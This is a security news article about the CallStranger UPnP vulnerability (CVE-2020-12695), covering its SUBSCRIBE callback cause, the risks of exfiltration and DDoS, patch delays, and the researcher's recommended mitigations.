[German]Currently, billions of devices are at risk from a bug if UPnP is used there. The vulnerability, called CallStranger, allows for data extraction, denial of service (DDoS) attacks, and internal network scanning.
Universal Plug and Play (UPnP) is a device feature that is used to automatically discover and interact with devices on the network. It is intended for local use in a trusted network, as no authentication or verification is required. Routers provide such functions to allow clients to browse the network.
The CallStranger vulnerability CVE-2020-12695
The vulnerability CVE-2020-12695, known as CallStranger, was discovered by security researcher Yunus Çadirci and reported to the Open Connectivity Foundation (OCF) on December 12, 2019 (see this CallStranger web page). The organization is responsible for UPnP development.
— Yunus ÇADIRCI (@yunuscadirci) June 8, 2020
The CallStranger vulnerability, found in billions of UPNP devices, can be used to exfiltrate data (even if you have appropriate DLP/protection), scan a network, or even exploit the network for a DDoS attack, the researcher writes on GitHub.
The CallStranger vulnerability is caused by the value of the callback header in the UPnP SUBSCRIBE function, which can be controlled by an attacker. This allows an SSRF-like vulnerability to affect millions of Internet-connected devices and billions of LAN devices.
A fix takes time
The colleagues from Bleeping Computer write here that a patch has been available for 2 months. It seems there is a revision 2.0 of the UPnP interface. The problem is that the patch need to be made available for all devices in the near future and the user need to update the devices. This should be the problem, because it depends on the vendors to implement the fix. This will take time, and there will be a lot of devices that are no longer supported and thus will not receive updates. Also, supported devices are not updated by the users.
Affected devices and mitigations
Bleeping Computer quotes Çadirci as saying that not all UPnP stacks are vulnerable. Miniupnp for example is not. Çadirci, has published this page with a list of vulnerable devices. In the absence of an updated UPnP stack, he recommends the following risk mitigation steps:
- Disable unnecessary UPnP services, especially for devices/interfaces connected to the Internet.
- Check intranet and server networks to ensure that UPnP devices (routers, IP cameras, printers, media gateways, etc.) do not allow data exfiltration.
- Scan network security logs to verify if this vulnerability has been exploited by a threat actor.
Users should also contact the manufacturer of the devices to see if an update is available or planned. Users can also contact their ISP and ask if there is DDoS protection (only makes sense if that ISP has solutions that can block traffic generated by UPnP SUBSCRIBE (HTTP NOTIFY)).